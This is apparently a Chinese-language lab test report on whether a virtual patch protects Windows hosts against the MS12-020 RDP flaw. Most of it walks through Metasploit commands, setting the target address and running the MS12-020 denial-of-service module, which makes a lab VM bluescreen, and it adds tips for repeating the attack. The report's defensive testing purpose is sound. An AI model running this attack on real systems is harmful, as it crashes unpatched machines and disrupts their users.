关于MS12020漏洞攻击测试报告

1 关 于 MS12-020漏 洞 攻 击 测 试 报 告 测 试 目 的 ： 针 对 windows操 作 系 统 的 漏 洞 ， 在 为 打 补 丁 之 前 ， 利 用 虚 拟 补 丁 对 漏 洞 进 行 防护 的 有 效 性 ， 保 护 用 户 使 用 安 全 。 操 作 系 统 （ 版 本 、语言）:服务器端： windows server 2008 R2 64位， 客户 端： windows xp 64位。 一、虚 拟 补 丁 功能测 试 过程 漏 洞 编号： MS12-020 测 试 工具： metasploit 测 试 过程： 2 客 户 端 ： 1、确定系统没有安装 MS12-020补丁（KB2621440 或 KB2667402） 3 2、启用远程桌面服务 4 5 攻 击 主 机 1、 安 装 攻 击 测 试 工 具 metasploit。 2、 安 装 完 后 ， 打 开 metasploit： 开 始 —所有程序—Metasploit中的 Metasploit Console控制台： 3、 控制台打 开 后 ， 将出现如下界面 6 4、 攻 击 开 始 (1) 输 入 如 下 命 令 （ 红 色 字 体 为 需 要 输 入 部 分 ） msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids msf auxiliary(ms12_020_maxchannelids) > show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Description —- ————— ——– ———– RHOST yes The target address RPORT 3389 yes The target port msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.51.88 7 RHOST => 192.168.51.88 5、攻击命令输入 msf auxiliary(ms12_020_maxchannelids) > exploit 8 6、 被攻击主机将瞬间蓝屏 备注：请在被攻击主机系统完全启动完毕后，等待一会儿再进行攻击，因为一般 VM启动后，远程桌面需要稍等片刻才会完全启动完毕。 攻击时，如果未出现蓝屏，请重复攻击 1-2次。 攻击成功后，将显示 RPDWD.SYS问题导致蓝屏 9 7、攻击主机显示目标计算机的 RDP协议 Down掉